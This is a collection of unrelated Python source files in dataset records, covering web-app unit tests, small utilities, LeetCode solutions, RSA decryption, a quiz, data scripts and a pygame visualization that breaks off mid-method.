self.get_minced_path('_'.join([prefix, suffix]))\n with open(fp) as f:\n self.assertEqual(f.read(), res['spacers'].read())\n res['StdOut'].close()\n res['StdErr'].close()\n\n def tearDown(self):\n # remove the tempdir and contents\n rmtree(self.temp_dir)\n\nif __name__ == '__main__':\n main()\n","sub_path":"micronota/bfillings/tests/test_minced.py","file_name":"test_minced.py","file_ext":"py","file_size_in_byte":3855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"348898526","text":"# -*- coding: utf-8 -*-\n'''\n检测数据是否已在csv文件中存在\n'''\nimport CsvOperation\nclass CheckRepeated:\n def checkrepeated(self,filename,tocheckdatas):\n csvoperation=CsvOperation()\n __contents=[]\n #获取除了ismailed以外的数据用于比对\n __contents=csvoperation.csvgetlines(filename,-2)\n for tocheckdata in tocheckdatas:\n if tocheckdata in __contents:\n return True\n else:\n return False\n","sub_path":"CheckRepeated.py","file_name":"CheckRepeated.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"190756030","text":"\"\"\"Message View tests.\"\"\"\nimport os\nfrom unittest import TestCase\n\nfrom models import db, connect_db, Message, User\n\nos.environ['DATABASE_URL'] = \"postgresql:///warbler-test\"\n\nfrom app import app, CURR_USER_KEY\n\ndb.create_all()\n\napp.config['WTF_CSRF_ENABLED'] = False\n\n\nclass MessageViewTestCase(TestCase):\n \"\"\"Test views for messages.\"\"\"\n\n def setUp(self):\n \"\"\"Create test client, add sample data.\"\"\"\n\n db.drop_all()\n db.create_all()\n\n self.client = app.test_client()\n\n self.testuser = User.signup(username=\"testuser\",\n email=\"test@test.com\",\n password=\"password\",\n image_url=None\n )\n\n self.testuser_id = 12345\n self.testuser.id = self.testuser_id \n\n db.session.commit()\n\n\n def tearDown(self):\n res = super().tearDown()\n db.session.rollback()\n return res\n\n\n def test_add_message(self):\n \"\"\"Can use add a message?\"\"\"\n # Since we need to change the session to mimic logging in,\n # we need to use the changing-session trick:\n\n with 
self.client as c:\n with c.session_transaction() as sess:\n sess[CURR_USER_KEY] = self.testuser.id\n\n # Now, that session setting is saved, so we can have\n # the rest of ours test\n\n resp = c.post(\"/messages/new\", data={\"text\": \"Hello\"})\n\n # Make sure it redirects\n self.assertEqual(resp.status_code, 302)\n\n msg = Message.query.one()\n self.assertEqual(msg.text, \"Hello\")\n \n\n\n def test_add_no_session(self):\n \"\"\"Test add a message without session\"\"\"\n with self.client as c:\n resp = c.post(\"/messages/new\", data={\"text\": \"Hello\"}, follow_redirects=True)\n self.assertEqual(resp.status_code, 200)\n self.assertIn(\"Access unauthorized\", str(resp.data))\n\n\n \n def test_add_invalid_user(self):\n \"\"\"Test add a message with invalid user\"\"\"\n with self.client as c:\n with c.session_transaction() as sess:\n sess[CURR_USER_KEY] = 999999999\n # user does not exist\n resp = c.post(\"/messages/new\", data={\"text\": \"Hello\"}, follow_redirects=True)\n self.assertEqual(resp.status_code, 200)\n self.assertIn(\"Access unauthorized\", str(resp.data))\n\n\n\n def test_message_show(self):\n \"\"\"Test showing a message\"\"\" \n m = Message(\n id=1234,\n text=\"a test message\",\n user_id=self.testuser_id\n )\n\n db.session.add(m)\n db.session.commit()\n\n with self.client as c:\n with c.session_transaction() as sess:\n sess[CURR_USER_KEY] = self.testuser.id\n\n m = Message.query.get(1234)\n\n resp = c.get(f'/messages/{m.id}')\n\n self.assertEqual(resp.status_code, 200)\n self.assertIn(m.text, str(resp.data))\n\n\n\n def test_invalid_message_show(self):\n \"\"\"Test invalid message\"\"\" \n with self.client as c:\n with c.session_transaction() as sess:\n sess[CURR_USER_KEY] = self.testuser.id\n\n resp = c.get('/messages/9999999')\n\n self.assertEqual(resp.status_code, 404)\n\n\n\n def test_delete_message(self):\n \"\"\"Test delete message\"\"\"\n m = Message(\n id=1234,\n text=\"a test message\",\n user_id=self.testuser_id\n )\n\n db.session.add(m)\n db.session.commit()\n\n with self.client as c:\n with c.session_transaction() as sess:\n sess[CURR_USER_KEY] = self.testuser.id\n \n resp = c.post('/messages/1234/delete', follow_redirects=True)\n self.assertEqual(resp.status_code, 200)\n\n m = Message.query.get(1234)\n self.assertIsNone(m)\n\n\n\n def test_unauthorized_message_delete(self):\n \"\"\"Test unauthorized message delete\"\"\"\n\n u2 = User.signup(username=\"testuser_two\",\n email=\"test_two@test.com\",\n password=\"password\",\n image_url=None\n )\n u2.id = 98765\n\n m = Message(\n id=1234,\n text=\"a test message\",\n user_id=self.testuser_id\n )\n\n db.session.add_all([u2, m])\n db.session.commit()\n\n with self.client as c:\n with c.session_transaction() as sess:\n sess[CURR_USER_KEY] = 98765\n \n resp = c.post('/messages/1234/delete', follow_redirects=True)\n self.assertEqual(resp.status_code, 200)\n self.assertIn(\"Access unauthorized\", str(resp.data))\n\n m = Message.query.get(1234)\n self.assertIsNotNone(m)\n\n","sub_path":"test_message_views.py","file_name":"test_message_views.py","file_ext":"py","file_size_in_byte":4909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"100965520","text":"'''\nQUIZ MASTER PROJECT\n-------------------\nThe criteria for the project are on the website. 
Make sure you test this quiz with \ntwo of your student colleagues before you run it by your instructor.\n\n7-10 question quiz about whatever I have on my mind\n'''\n\ncount = 0\n\ndef correct(): #subroutine for when the user gets the question correct, so I dont have to type everything out every single time\n print('\\nThat is the correct answer.')\n global count\n count = count + 1\n\ndef incorrect(): #subroutine for when the user gets the question incorrect\n print('\\nThat is not the correct answer.')\n\nprint('\\nWhich of the following is my least favorite class?\\nA) AP Government\\nB) Advanced Composition\\nC) Both')\nanswer = input('Enter answer HERE: ') #question 1\nif answer.upper() == 'C' or answer.upper() == 'BOTH':\n correct()\nelse:\n incorrect()\n\nprint('\\nWhat is the name of my favorite robot?') #question 2\nanswer = input('Enter answer HERE: ')\nif answer.upper() == 'TOM' or answer.upper() == 'TOM 2.0':\n correct()\nelse:\n incorrect()\n\nprint('\\nYES/NO: Is League of Legends a fun game?') #question 3\nanswer = input('Enter answer HERE: ')\nif answer.upper() == 'NO' or answer.upper() == 'ABSOLUTELY NOT':\n correct()\nelse:\n incorrect()\n\nprint('\\nYES/NO: Is it easy to think of these questions?') #question 4\nanswer = input('Enter answer HERE: ')\nif answer.upper() == 'NO':\n correct()\nelse:\n incorrect()\n\nprint('\\nWhat are the derived units (mks) of length?') #question 5\nanswer = input('Enter answer HERE: ')\nif answer.upper() == 'M' or answer.upper() == 'METERS':\n correct()\nelse:\n incorrect()\n\nprint('\\nWhat is 2+2*4?')\nanswer = int(input('Enter answer HERE: ')) #question 6\nif answer == 10:\n correct()\nelse:\n incorrect()\n\nprint('\\nWhich of the following colors is the most sus?\\nA) Cyan\\nB) Red\\nC) Green\\nD) Yellow')\nanswer = input('Enter answer HERE: ') #question 7\nif answer.upper() == 'B' or answer.upper() == 'RED':\n correct()\nelse:\n incorrect()\n\nprint('\\nWhich of the following is superior?\\nA) PC\\nB) Mac') #question 8\nanswer = input('Enter answer HERE: ')\nif answer.upper() == 'A' or answer.upper() == 'PC':\n correct()\nelse:\n incorrect()\n\npercentage = (count/8)*100\n\ntext = 'Your quiz grade is '\nif percentage >= 90: #Dont make me comment the if/else because you and I both know how they work\n print('\\nCongratulations! '+text+'an A, '+str(percentage)+'%')\n\nelif percentage < 90 and percentage >= 80:\n print('\\n'+text+'a B, '+str(percentage)+'%')\n\nelif percentage < 80 and percentage >= 70:\n print('\\n'+text+'a C, '+str(percentage)+'%')\n\nelif percentage <70 and percentage >= 60:\n print('\\n'+text+'a D, '+str(percentage)+'%')\n\nelse:\n print('\\n'+text+str(percentage)+\"%. 
I honestly don't know how you got here.\")\n","sub_path":"4.3_Quiz_Master.py","file_name":"4.3_Quiz_Master.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"302482616","text":"import numpy as np\nimport mrc_functions as mrc\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport statsmodels.api as sm\nfrom scipy.stats import beta as bt\nplt.style.use('seaborn-white')\n\n################################\n#### We Create the Data set ###\n\ndef calculate_example1(sigma=1, n=100):\n beta0=[2,-1,1,0]\n beta0=mrc.normalize(beta0)\n x = np.random.normal(0, 1, [n,4])\n epsilon=sigma*np.random.lognormal(0,1,n)\n Ix=np.dot(x,beta0)\n y=(Ix*epsilon)/(1+np.exp(-Ix+epsilon))\n\n #### solving the ori\n beta_ini = np.random.uniform(-1, 1, 4)\n beta_ori, tauback, iteration = mrc.ori(y, x, 4, 200, beta_ini)\n Ixback=np.dot(x,beta_ori)\n\n\n #solving the glm\n xx = sm.add_constant(x)\n Gaussian_model = sm.GLM(y, xx, family=sm.families.Gaussian())\n Gaussian_results = Gaussian_model.fit()\n beta_glm = mrc.normalize(Gaussian_results.params[1:])\n\n cosglm=np.abs(np.dot(beta0,beta_glm))\n cosori=np.abs(np.dot(beta0,beta_ori))\n deltacos=cosori-cosglm\n\n\n return(cosori, cosglm,deltacos)\n\ntrials=1000\nn=100\nfor sigma in [.5]:\n print(sigma)\n dc=np.zeros((trials,3))\n for i in np.arange(trials):\n dc[i,:]=calculate_example1(sigma, n)\n print(sigma, i)\n\npdc=pd.DataFrame(dc)\npdc.columns=['cos_ori', 'cos_glm', 'delta_cos']\nname='data/example1b_'+str(sigma)+'.csv'\npdc.to_csv(name)\n\npdc=pd.read_csv(name)\n\n\nplt.hist(pdc['cos_glm'], color='mediumseagreen', label='GLM')\nplt.hist(pdc['cos_ori'], color='steelblue', label='ORI')\nplt.xlabel('Cosine Similarity')\nplt.ylabel('Frequency')\nplt.legend(loc='best')\nplt.savefig('../example_1b_dec2019.png')\nplt.show()\n\n","sub_path":"01_Index_example1b.py","file_name":"01_Index_example1b.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"603688321","text":"# -*- coding:utf-8 -*-\n\n__author__ = [\n '\"liubo\" '\n]\n\n\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def deleteNode(self, node):\n \"\"\"\n :type node: ListNode\n :rtype: void Do not return anything, modify node in-place instead.\n \"\"\"\n p = node\n\n if p.next:\n p.val = p.next.val\n p.next = p.next.next\n","sub_path":"237_delete_node_in_a_linked_list.py","file_name":"237_delete_node_in_a_linked_list.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"517469475","text":"import json\n\ndef decrypt():\n # Decrypts a message\n\n print(\"\\n...\")\n\n # Load Public Key and Private Key from 'keys.json'\n file = open('./resources/keys.json',)\n keys = json.load(file)\n file.close()\n n = keys[\"public\"][\"n\"]\n d = keys[\"private\"][\"d\"]\n if n and d:\n print(\"Private Key successfully loaded!\")\n else:\n print(\"Error: Private Key not found\")\n\n\n # Load cipher from 'cipher.txt'\n with open('./resources/cipher.txt') as file:\n cipher = file.read()\n if cipher:\n print(\"Cipher successfully loaded!\")\n else:\n print(\"Error: Cipher not found\")\n\n\n # Perform RSA Decryption\n plaintext = \"\"\n ciphersplit = cipher.split()\n for character in ciphersplit:\n x = int(character) #transform 
unicode to letter\n        plaintext += chr(pow(x, d, n))\n    if plaintext:\n        print(\"Message successfully generated!\")\n    else:\n        print(\"Error: Message could not be generated\")\n\n\n    # Save the decrypted message in message.txt\n    with open('./resources/message.txt', 'w') as file:\n        file.write(plaintext)\n    if plaintext:\n        print(\"Message successfully saved!\")\n    else:\n        print(\"Error: Message could not be saved\")\n    \n    print(\"...\")\n\n","sub_path":"lib/decrypt.py","file_name":"decrypt.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
+{"seq_id":"388984112","text":" # Hello World Example\n#\n# Welcome to the OpenMV IDE! Click on the green run arrow button below to run the script!\n\nimport sensor, image, time, pyb\n\nsensor.reset()                      # Reset and initialize the sensor.\nsensor.set_pixformat(sensor.GRAYSCALE) # Set pixel format to GRAYSCALE\nsensor.set_framesize(sensor.VGA)   # Set frame size to VGA (640x480)\n#sensor.set_windowing((640, 80))\nsensor.skip_frames(time = 500)     # Wait for settings to take effect.\nclock = time.clock()                # Create a clock object to track the FPS.\ngreen_led = pyb.LED(2)\n\nwhile(True):\n    #pyb.delay(100)\n    clock.tick()                    # Update the FPS clock.\n    img = sensor.snapshot()         # Take a picture and return the image.\n    hist=img.get_histogram()\n    th=hist.get_threshold()\n    #img.binary([(th,255)])\n    print(\"Hola\")\n    green_led.toggle()\n    print(clock.fps())              # Note: OpenMV Cam runs about half as fast when connected\n                                    # to the IDE. The FPS should increase once disconnected.\n","sub_path":"Primeras pruebas/00 Ejemplo captura.py","file_name":"00 Ejemplo captura.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
+{"seq_id":"135452358","text":"import pytest\n\nfrom nplinker.metabolomics.gnps.gnps_file_mapping_loader import GNPSFileMappingLoader\nfrom tests import DATA_DIR\n\n@pytest.fixture\ndef loader() -> GNPSFileMappingLoader:\n    filename = DATA_DIR / \"nodes.tsv\"\n    return GNPSFileMappingLoader(filename)\n\ndef test_default(loader):\n    assert loader is not None\n\n@pytest.mark.parametrize(\"filename, expected_length, spectrum_id, samples\", [\n    [DATA_DIR / \"nodes_fbmn_mwe.csv\", 9, \"301\", [\"20210623_10_9A_1uL.mzML\", \"20210623_16_9C_1uL.mzML\", \"20210623_12_5B_1uL.mzML\", \"20210623_13_9B_1uL.mzML\"]],\n    [DATA_DIR / \"nodes_fbmn_mwe.csv\", 9, \"1465\", [\"20210623_10_9A_1uL.mzML\", \"20210623_16_9C_1uL.mzML\"]],\n    [DATA_DIR / \"nodes_fbmn.csv\", 994, \"304\", [\"20210623_10_9A_1uL.mzML\", \"20210623_16_9C_1uL.mzML\", \"20210623_13_9B_1uL.mzML\"]],\n    [DATA_DIR / \"nodes_mwe.csv\", 13, \"275\", [\"26c.mzXML\", \"26c.mzXML\", \"26c.mzXML\"]],\n    [DATA_DIR / \"nodes.tsv\", 25935, \"223\", [\"26c.mzXML\", \"26c.mzXML\", \"26c.mzXML\"]]\n])\ndef test_load_mapping(filename, expected_length, spectrum_id, samples):\n    sut = GNPSFileMappingLoader(str(filename))\n    actual = sut.mapping()\n\n    assert actual[spectrum_id] == samples\n    assert len(actual) == expected_length\n","sub_path":"tests/metabolomics/test_gnps_file_mapping_loader.py","file_name":"test_gnps_file_mapping_loader.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
+{"seq_id":"386706885","text":"from collections import Counter, defaultdict, OrderedDict, deque\nfrom bisect import bisect_left, bisect_right\nfrom functools import reduce, lru_cache\nfrom typing import List\nimport 
itertools\nimport math\nimport heapq\nimport string\ntrue = True\nfalse = False\nMIN, MAX, MOD = -0x3f3f3f3f, 0x3f3f3f3f, 1000000007\n#\n# @lc app=leetcode id=1559 lang=python3\n#\n# [1559] Detect Cycles in 2D Grid\n#\n# https://leetcode.com/problems/detect-cycles-in-2d-grid/description/\n#\n# algorithms\n# Hard (41.58%)\n# Total Accepted: 3.7K\n# Total Submissions: 8.8K\n# Testcase Example: '[[\"a\",\"a\",\"a\",\"a\"],[\"a\",\"b\",\"b\",\"a\"],[\"a\",\"b\",\"b\",\"a\"],[\"a\",\"a\",\"a\",\"a\"]]'\n#\n# Given a 2D array of characters grid of size m x n, you need to find if there\n# exists any cycle consisting of the same value in grid.\n#\n# A cycle is a path of length 4 or more in the grid that starts and ends at the\n# same cell. From a given cell, you can move to one of the cells adjacent to it\n# - in one of the four directions (up, down, left, or right), if it has the\n# same value of the current cell.\n#\n# Also, you cannot move to the cell that you visited in your last move. For\n# example, the cycle (1, 1) -> (1, 2) -> (1, 1) is invalid because from (1, 2)\n# we visited (1, 1) which was the last visited cell.\n#\n# Return true if any cycle of the same value exists in grid, otherwise, return\n# false.\n#\n#\n# Example 1:\n#\n#\n#\n#\n# Input: grid =\n# [[\"a\",\"a\",\"a\",\"a\"],[\"a\",\"b\",\"b\",\"a\"],[\"a\",\"b\",\"b\",\"a\"],[\"a\",\"a\",\"a\",\"a\"]]\n# Output: true\n# Explanation: There are two valid cycles shown in different colors in the\n# image below:\n#\n#\n#\n# Example 2:\n#\n#\n#\n#\n# Input: grid =\n# [[\"c\",\"c\",\"c\",\"a\"],[\"c\",\"d\",\"c\",\"c\"],[\"c\",\"c\",\"e\",\"c\"],[\"f\",\"c\",\"c\",\"c\"]]\n# Output: true\n# Explanation: There is only one valid cycle highlighted in the image below:\n#\n#\n#\n# Example 3:\n#\n#\n#\n#\n# Input: grid = [[\"a\",\"b\",\"b\"],[\"b\",\"z\",\"b\"],[\"b\",\"b\",\"a\"]]\n# Output: false\n#\n#\n#\n# Constraints:\n#\n#\n# m == grid.length\n# n == grid[i].length\n# 1 <= m <= 500\n# 1 <= n <= 500\n# grid consists only of lowercase English letters.\n#\n#\n#\ndirs = [-1, 0, 1, 0, -1]\n\n\ndef pair2id(i, j):\n return i * 500 + j\n\n\nclass Solution:\n def is_cycle(self, g, i, j, a, b):\n self.visited.add(pair2id(i, j))\n for d in range(4):\n ni, nj = i + dirs[d], j + dirs[d + 1]\n if 0 <= ni < len(g) and 0 <= nj < len(\n g[0]) and (ni != a or nj != b) and g[i][j] == g[ni][nj]:\n if pair2id(ni, nj) in self.visited or self.is_cycle(\n g, ni, nj, i, j):\n return True\n return False\n\n def containsCycle(self, g: List[List[str]]) -> bool:\n self.visited = set()\n n, m = len(g), len(g[0])\n for i in range(n):\n for j in range(m):\n cid = i * 500 + j\n if cid not in self.visited and self.is_cycle(g, i, j, -1, -1):\n return True\n return False\n\n\nsol = Solution()\n\ngrid = [[\"a\", \"a\", \"a\", \"a\"], [\"a\", \"b\", \"b\", \"a\"], [\"a\", \"b\", \"b\", \"a\"],\n [\"a\", \"a\", \"a\", \"a\"]]\ngrid = [[\"c\", \"c\", \"c\", \"a\"], [\"c\", \"d\", \"c\", \"c\"], [\"c\", \"c\", \"e\", \"c\"],\n [\"f\", \"c\", \"c\", \"c\"]]\ngrid = [[\"a\", \"b\", \"b\"], [\"b\", \"z\", \"b\"], [\"b\", \"b\", \"a\"]]\nprint(sol.containsCycle(grid))\n","sub_path":"python_solutions/1559.detect-cycles-in-2d-grid.py","file_name":"1559.detect-cycles-in-2d-grid.py","file_ext":"py","file_size_in_byte":3252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"507771604","text":"from app import client\nfrom bson.objectid import ObjectId\nimport logging\nclass db():\n \n client = client\n\n def getFtModel(self, id):\n 
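# fetch a single model document by its Mongo ObjectId; malformed ids are logged below\n        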
try:\n m = self.client.ft.models.find_one(filter={\"_id\":ObjectId(id)})\n except:\n logging.error(f'INVALID MODEL ID {id}')\n if m:\n return m\n \n def getFtDatasets(self):\n return self.client.datasets\n def getFtStats(self):\n return self.client.stats\n \n def writeModel(self,aimodel):\n model = {\"model\" :\n { \n \"name\" : aimodel.name,\n \"version\" : aimodel.version,\n \"supervised\": aimodel.supervised,\n \"ft\": aimodel.ft,\n \"quantized\": aimodel.quantized,\n \"filepath\": aimodel.filepath,\n \"splitAt\" : aimodel.splitAt,\n \"bias\" : aimodel.bias,\n \"ngrams\" : aimodel.ngrams,\n \"learningRate\" : aimodel.learningRate,\n \"epochs\": aimodel.epochs,\n \"label\" : aimodel.label,\n \"method\": aimodel.method,\n \"dataset\" : aimodel.dataset.toDict() \n }\n }\n self.client.ft.models.find_one_and_replace(filter=model, replacement=model, upsert=True)\n \n def writeStats(self,stat):\n \n self.client.ft.stats.insert_one(stat)\n def writeDataSet(self,dataset):\n self.client.datasets.insert_one(dataset)\n \n \n\n","sub_path":"tina-worker/app/ft/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"244384017","text":"import asyncio\n\n\nclass Message:\n def __init__(self, id, kind='default', ok=True):\n self.id = id\n self.kind = kind\n self.ok = ok\n\nclass Subscriber:\n def __init__(self):\n self.queue = asyncio.Queue()\n self.active = True\n\n def send(self, msg):\n pass\n\n async def receive(self):\n await self.queue.get()\n\nclass Hub:\n def __init__(self):\n self.subscribers = []\n\n def subscribe(self, subscriber):\n self.subscribers.append(subscriber)\n\n async def send(self, msg):\n asyncio.create_task(self.publish(msg))\n\n async def publish(self, msg):\n for subscriber in self.subscribers:\n await subscriber.send(msg)\n\nhub = Hub()\n\nclass PostSubscriber(Subscriber):\n def __init__(self, id):\n super().__init__()\n self.id = id\n\n async def send(self, msg):\n print('put in queue')\n if msg.id != self.id:\n return\n await self.queue.put(msg)\n\nclass Runner:\n def run(self, task):\n #asyncio.run(coro, *, debug=False)\n #asyncio.run(self.main, debug=True)\n asyncio.run(task, debug=True)\n #loop = asyncio.get_event_loop()\n #loop.run_until_complete(task)\n #loop.run_forever(task)\n\n async def main(self):\n print('hello')\n\n\ntask = Task()\nrunner = Runner()\nrunner.run(task)\n#loop = asyncio.get_event_loop()\n#loop.run_until_complete(task)","sub_path":"experiments/exp_runner.py","file_name":"exp_runner.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"152380490","text":"import pandas as pd\nimport numpy as np\n\n\ndef call_file(year):\n path = '/Users/nathanoliver/Desktop/Python/US_Energy/csv/data_201' + \\\n str(year) + '.csv'\n data = pd.read_csv(path)\n return pd.DataFrame(data)\n\n\ndef concat(df1, df2):\n return pd.concat((df1, df2), axis='index')\n\n\ndf1 = call_file(1)\ndf2 = call_file(2)\n\nprint(len(df1))\nprint(len(df2))\n\ndf = pd.concat((df1, df2), axis='index')\n\nfor i in range(3, 10):\n df2 = call_file(i)\n df = concat(df, df2)\n print(i)\n\ndf.to_csv(\n '/Users/nathanoliver/Desktop/Python/US_Energy/csv/data_final.csv', index=False)\n","sub_path":"py/00_concat_files.py","file_name":"00_concat_files.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} 
+{"seq_id":"340427931","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass ScopeModel(nn.Module):\n def __init__(self, scope_len, num_class):\n super(ScopeModel, self).__init__()\n\n\n # scope_len = win_len / 2\n self.former = nn.Parameter(torch.ones(scope_len, 1), requires_grad=True)\n self.latter = nn.Parameter(torch.ones(scope_len, 1), requires_grad=True)\n\n # self.former = nn.Parameter(torch.linspace(0, 1, scope_len).view(-1,1), requires_grad=True)\n # self.latter = nn.Parameter(torch.linspace(1, 0, scope_len).view(-1,1), requires_grad=True)\n\n\n def forward(self, inputs):\n\n # size n , win_lne/2, num_classes\n input_former = inputs[0]\n\n # size n , win_lne/2, num_classes\n input_latter = inputs[1]\n\n # size n , win_lne/2, num_classes\n input_former = input_former*self.former\n input_latter = input_latter*self.latter\n\n # input_former = self.former(input_former)\n # input_latter = self.latter(input_latter)\n\n y_pred = input_former+input_latter\n\n\n return y_pred","sub_path":"har_pytorch/model_innv.py","file_name":"model_innv.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"554778396","text":"# Write a program to count the total number of bases\n# in all of the sequences in the file\n# /usr/coursehome/dalke/ambiguous_sequences.seq\n# and the total number of each base found, in order\n# \n# File has 24789 bases\n# A = 6504\n# B = 1\n# C = 5129\n# D = 1\n# G = 5868\n# K = 1\n# M = 1\n# N = 392\n# S = 2\n# R = 3\n# T = 6878\n# W = 1\n# Y = 8\n\nmain = \"\"\nfor seq in open(\"Chapter Specification/sequence.txt\"):\n seq = seq.rstrip()\n main = main+seq;\n\nseq = main\nprint(\"Sequence has\", len(seq), \"bases\")\ncounts = {}\nfor base in seq:\n counts[base] = counts.get(base, 0) + 1\n\nkeys = counts.keys()\nkeys = sorted(keys)\nfor i in keys:\n print(i, \"=\", counts[i])\n","sub_path":"3-2/CSE 3210 (Artificial Intelligence)/Lab Works by '15/Python All/23. Dictionaries - Exercise - 4.py","file_name":"23. 
Dictionaries - Exercise - 4.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"178483582","text":"from Constants import *\n\nclass Visualizer:\n \n def __init__(self, retina, visualization_width=1000, visualization_height=1000,\n visualization_background_color=pygame.Color(255,255,255), controls_width=250, \n controls_background_color=pygame.Color(245,245,245)):\n \n\n \n self.visualization_background_color = visualization_background_color\n self.controls_background_color = controls_background_color\n \n # The screen real estate (pixels) used for displaying visuals\n self.visualization_width = visualization_width\n self.visualization_height = visualization_height\n self.visualization_size = (self.visualization_width, self.visualization_height)\n self.visualization_position = (0, 0)\n \n # The screen real estate (pixels) used for adding controls\n self.controls_width = controls_width\n self.controls_height = visualization_height\n self.controls_size = (self.controls_width, self.controls_height)\n self.controls_position = (self.visualization_width, 0)\n \n # Total screen size for the pygame window\n self.screen_width = self.visualization_width + self.controls_width\n self.screen_height = self.visualization_height\n self.screen_size = (self.screen_width, self.screen_height)\n \n # Calculate the scaling from retina to the visualization size\n self.retina = retina\n self.visualization_scale = self.calculateVisualizationScaling() \n # Load and convert a bunch of retina stuff to display coordinates\n self.preloadRetina()\n \n # Start pygame \n pygame.init()\n \n # Create the pygame surfaces\n self.screen_surface = pygame.display.set_mode(self.screen_size)\n self.visualization_surface = pygame.Surface(self.visualization_size)\n self.controls_surface = pygame.Surface(self.controls_size)\n self.screen_surface.fill((255,255,255)) \n \n # Create a set of linked buttons to determine the visualization type\n visualization_types = [\"Stimulus\", \"Input Weights\", \"Soma Placement\", \"Activity\"]\n buttons = []\n width, height = 200, 40\n dy = 40 + 20\n x, y = int(self.controls_width/2.0-width/2.0), dy\n for vis_type in visualization_types:\n button = Button(self.controls_surface, text=vis_type, name=vis_type,\n x=x, y=y)\n y += dy\n buttons.append(button) \n self.visualization_type_button_group = LinkedButtons(buttons)\n \n # Create a set of linked buttons to determine the cell type\n cell_types = [\"Cone\", \"Horizontal\", \"On Bipolar\", \"Off Bipolar\", \"On Starburst\", \"Off Starburst\"]\n buttons = []\n width, height = 200, 40\n dy = 40 + 20\n x, y = int(self.controls_width/2.0-width/2.0), 400\n for cell_type in cell_types:\n button = Button(self.controls_surface, text=cell_type, name=cell_type,\n x=x, y=y)\n y += dy\n buttons.append(button) \n self.cell_type_button_group = LinkedButtons(buttons)\n \n # Create a set of linked buttons to change the timestep\n width = 90\n height = 40 \n x1 = button.button_rectangle.left\n x2 = button.button_rectangle.right - width\n y1 = 800\n y2 = 800 \n left = Button(self.controls_surface, text=\"<-\", name=\"Left\", \n x=x1, y=y1, width=width, height=height)\n x, y = x+30, 800\n right = Button(self.controls_surface, text=\"->\", name=\"Right\", \n x=x2, y=y2, width=width, height=height)\n self.direction_arrows_button_group = LinkedButtons([left, right])\n \n self.mainloop()\n \n \n \n def mainloop(self): \n running = True\n clock = pygame.time.Clock()\n while 
running:\n mouse_x, mouse_y = pygame.mouse.get_pos()\n mouse_click = False \n \n for event in pygame.event.get():\n if event.type == QUIT:\n running = False\n else:\n if event.type == MOUSEBUTTONUP:\n if event.button == 1:\n mouse_click = True\n \n # Hack to allow LEFT/RIGHT arrows to simulate button press\n if pygame.key.get_pressed()[K_LEFT]: \n self.timestep -= 1\n if self.timestep < 0: self.timestep = self.end_timestep\n elif pygame.key.get_pressed()[K_RIGHT]: \n self.timestep += 1\n if self.timestep > self.end_timestep: self.timestep = 0\n \n buttons_pressed = self.updateControlSurface(mouse_x, mouse_y, mouse_click)\n self.updateVisualizationSurface(buttons_pressed, mouse_x, mouse_y)\n \n pygame.display.update()\n clock.tick(60)\n \n \n \n def preloadRetina(self):\n \n r = self.retina \n \n self.cone_layer = r.cone_layer\n self.horizontal_layer = r.horizontal_layer\n self.on_bipolar_layer = r.on_bipolar_layer\n self.off_bipolar_layer = r.off_bipolar_layer\n self.on_starburst_layer = r.on_starburst_layer\n self.off_starburst_layer = r.off_starburst_layer\n \n self.cone_color = r.cone_color\n self.horizontal_color = r.horizontal_color\n self.on_bipolar_color = r.on_bipolar_color\n self.off_bipolar_color = r.off_bipolar_color\n self.on_starburst_color = r.on_starburst_color\n self.off_starburst_color = r.off_starburst_color\n \n self.cone_color_deselected = lerpColors(self.cone_color, self.visualization_background_color, 0.85)\n self.horizontal_color_deselected = lerpColors(self.horizontal_color, self.visualization_background_color, 0.85)\n self.on_bipolar_color_deselected = lerpColors(self.on_bipolar_color, self.visualization_background_color, 0.85)\n self.off_bipolar_color_deselected = lerpColors(self.off_bipolar_color, self.visualization_background_color, 0.85)\n self.on_starburst_color_deselected = lerpColors(self.on_starburst_color, self.visualization_background_color, 0.85)\n self.off_starburst_color_deselected = lerpColors(self.off_starburst_color, self.visualization_background_color, 0.85)\n \n self.cone_activities = r.cone_activities\n self.horizontal_activities = r.horizontal_activities\n self.on_bipolar_activities = r.on_bipolar_activities\n self.off_bipolar_activities = r.off_bipolar_activities\n self.on_starburst_activities = r.on_starburst_activities\n self.off_starburst_activities = r.off_starburst_activities\n \n self.cone_activity_bounds = r.activity_bounds[0]\n self.horizontal_activity_bounds = r.activity_bounds[1]\n self.on_bipolar_activity_bounds = r.activity_bounds[2]\n self.off_bipolar_activity_bounds = 